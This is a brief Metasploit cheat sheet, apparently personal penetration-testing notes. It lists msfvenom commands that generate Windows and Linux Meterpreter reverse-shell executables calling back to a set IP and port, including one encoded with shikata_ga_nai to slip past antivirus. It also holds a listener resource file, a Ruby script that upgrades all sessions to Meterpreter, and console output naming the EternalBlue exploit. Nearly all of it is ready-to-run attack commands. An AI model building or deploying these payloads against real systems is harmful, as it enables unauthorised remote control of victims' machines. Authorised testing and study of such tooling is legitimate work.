Metasploit
Msfvenom
List payload : msfvenom --list payload
# Windows (EXE)
$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.9.52.138 LPORT=9001 -f exe -o shell.exe
# Windows (x86 EXE with encoder)
$ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.9.52.138 LPORT=9001 -f exe -o shell.exe
# Linux (ELF)
$ msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.9.52.138 LPORT=9001 -f elf -o shell.bin
staged: 2 parts, a listener, then the reverse shell is send to the listener.stageless: Reverse shell is directly inside the payload.
Ressource file
File listener.rc :
use exploit/multi/handler
set LHOST tun0
set LPORT 9001
set payload windows/x64/meterpreter_reverse_tcp
exploit -j
Command : msfconsole -r listener.rc
Use ruby inside ressource file.
msf6 > resource shell2meterpreter.rc
[*] Processing /tmp/shell2meterpreter.rc for ERB directives.
[*] resource (/tmp/shell2meterpreter.rc)> Ruby Code (165 bytes)
File shell2meterpreter.rc :
<ruby>
framework.sessions.each_pair do |sid, session|
run_single("use post/multi/manage/shell_to_meterpreter")
run_single("set SESSION #{sid}")
run_single("run")
end
</ruby>
Favorites
Add module to favorites :
msf6 exploit(multi/handler) > favorite
[+] Added exploit/multi/handler to the favorite modules file
Show favorites :
msf6 > show favorites
Favorites
=========
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/handler manual No Generic Payload Handler
1 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
Delete a favorite :
msf6 > favorite -d exploit/multi/handler
[*] Removing exploit/multi/handler from the favorite modules file
Modules
shell_to_meterpreter
msf6 > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf6 post(multi/manage/shell_to_meterpreter) > set LPORT 4445
LPORT => 4445
msf6 post(multi/manage/shell_to_meterpreter) > run